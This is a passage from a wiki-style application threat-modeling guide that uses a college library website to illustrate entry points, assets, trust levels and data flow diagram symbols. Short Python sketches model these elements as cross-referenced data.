&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Entry Points&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;45%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;HTTPS Port&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will only be accessible via TLS. All pages within the college library website are layered on this entry point.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Main Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The splash page for the college library website is the entry point for all users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Students, faculty members and librarians must log in to the college library website before they can carry out any of the use cases.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Function&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login function accepts user supplied credentials and compares them with those in the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Search Entry Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The page used to enter a search query.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
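As an illustration, the layered entry points in the example table can be captured as simple records; this is a minimal sketch in Python with hypothetical class and field names, not part of the methodology itself.&lt;br /&gt;

```python
# Minimal sketch of an entry-point record; names here are hypothetical.
from dataclasses import dataclass

@dataclass
class EntryPoint:
    id: str             # major.minor notation for layered entry points, e.g. "1.2"
    name: str
    description: str
    trust_levels: list  # trust-level IDs cross referenced later in the model

    def is_layered_under(self, parent_id):
        # "1.2" is layered under "1": the dotted ID prefix encodes the layering.
        return self.id.startswith(parent_id + ".")

https_port = EntryPoint("1", "HTTPS Port", "TLS-only access to the site", [1, 2, 3, 4])
login_page = EntryPoint("1.2", "Login Page", "Login form for all users", [1, 2, 3, 4])

assert login_page.is_layered_under(https_port.id)
```

The dotted-prefix check mirrors the major.minor notation recommended above.&lt;br /&gt;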
&lt;br /&gt;
==Assets==&lt;br /&gt;
The system must have something that the attacker is interested in; these items/areas of interest are defined as assets. Assets are essentially threat targets, i.e. they are the reason threats will exist. Assets can be both physical assets and abstract assets. For example, an asset of an application might be a list of clients and their personal information; this is a physical asset. An abstract asset might be the reputation of an organisation. Assets are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID is assigned to identify each asset. This will be used to cross reference the asset with any threats or vulnerabilities that are identified.&lt;br /&gt;
# '''Name''' - A descriptive name that clearly identifies the asset.&lt;br /&gt;
# '''Description''' - A textual description of what the asset is and why it needs to be protected.&lt;br /&gt;
# '''Trust Levels''' - The level of access required to access the asset is documented here. These will be cross referenced with the trust levels defined in the next step.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Assets&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;55%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Users and Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a student or a faculty member will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a Librarian will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Personal Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website will store personal information relating to the students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;System&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the underlying system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability of College Library Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website should be available 24 hours a day and can be accessed by all students, college faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute Code as a Web Server User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute source code on the web server as a web server user.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select queries on the database, and thus retrieve any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select, insert, and update queries on the database, and thus have read and write access to any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Session&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the login session of a user to the College Library website. This user could be a student, a member of the college faculty, or a Librarian.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the Database Server&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the database server allows you to administer the database, giving you full access to the database users and all data contained within the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Create Users&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The ability to create users would allow an individual to create new users on the system. These could be student users, faculty member users, and librarian users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to Audit Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The audit data shows all auditable events performed within the College Library application by students, staff, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
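The asset table above can likewise be held as structured data so that assets and trust levels can be cross referenced programmatically; a minimal sketch with hypothetical names:&lt;br /&gt;

```python
# Assets keyed by ID, each listing the trust levels that may interact with it.
# Entries are abbreviated from the example table; names are hypothetical.
assets = {
    "1.1": {
        "name": "User Login Details",
        "trust_levels": [2, 4, 5, 7, 8, 9],
    },
    "3.1": {
        "name": "Login Session",
        "trust_levels": [2, 4],
    },
}

def assets_reachable_by(trust_level):
    # Cross-reference: which assets can a given trust level interact with?
    return sorted(aid for aid, a in assets.items() if trust_level in a["trust_levels"])

assert assets_reachable_by(2) == ["1.1", "3.1"]
```

Such a lookup makes it easy to ask, per trust level, which threat targets are in reach.&lt;br /&gt;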
&lt;br /&gt;
==Trust Levels==&lt;br /&gt;
Trust levels represent the access rights that the application will grant to external entities. The trust levels are cross referenced with the entry points and assets. This allows us to define the access rights or privileges required at each entry point, and those required to interact with each asset. Trust levels are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique number is assigned to each trust level. This is used to cross reference the trust level with the entry points and assets.&lt;br /&gt;
# '''Name''' - A descriptive name that allows you to identify the external entities that have been granted this trust level.&lt;br /&gt;
# '''Description''' - A textual description of the trust level detailing the external entity who has been granted the trust level.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;70%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Anonymous Web User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website but has not provided valid credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Valid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and has logged in using valid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Invalid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and is attempting to log in using invalid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The librarian can create users on the library website and view their personal information.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Server Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server administrator has read and write access to the database that is used by the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Website administrator can configure the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Web Server User Process&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the process/user as which the web server executes code and authenticates itself to the database server.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read and write access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
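Because trust levels are cross referenced from both entry points and assets, a quick consistency check that every referenced ID is actually defined can be useful; a sketch using the example IDs above:&lt;br /&gt;

```python
# Trust levels from the example table; the IDs are the cross-reference keys.
trust_levels = {
    1: "Anonymous Web User",
    2: "User with Valid Login Credentials",
    3: "User with Invalid Login Credentials",
    4: "Librarian",
    5: "Database Server Administrator",
    6: "Website Administrator",
    7: "Web Server User Process",
    8: "Database Read User",
    9: "Database Read/Write User",
}

# IDs referenced anywhere in the example entry points and assets.
referenced = {1, 2, 3, 4, 5, 6, 7, 8, 9}

# Every referenced trust level must be defined, or the model is inconsistent.
undefined = referenced - set(trust_levels)
assert undefined == set()
```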
&lt;br /&gt;
==Data Flow Diagrams==&lt;br /&gt;
All of the information collected allows us to accurately model the application through the use of Data Flow Diagrams (DFDs). The DFDs will allow us to gain a better understanding of the application by providing a visual representation of how the application processes data. The focus of the DFDs is on how data moves through the application and what happens to the data as it moves. DFDs are hierarchical in structure, so they can be used to decompose the application into subsystems and lower-level subsystems. The high level DFD will allow us to clarify the scope of the application being modeled. The lower level iterations will allow us to focus on the specific processes involved when processing specific data. There are a number of symbols that are used in DFDs for threat modeling. These are described below:&lt;br /&gt;
&lt;br /&gt;
'''External Entity'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_external_entity.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Multiple Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The multiple process shape is used to represent a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_multiple_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Data Store'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data store shape is used to represent locations where data is stored. Data stores do not modify the data, they only store data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_store.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Flow'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_flow.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Privilege Boundary'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_privilge_boundary.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
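The DFD element types above can be modeled as a small typed graph; the class and method names below are hypothetical, shown only to illustrate the shapes and directed data flows:&lt;br /&gt;

```python
# Hypothetical DFD container; element type names follow the shapes above.
ELEMENT_TYPES = {"external_entity", "process", "multiple_process", "data_store"}

class DFD:
    def __init__(self):
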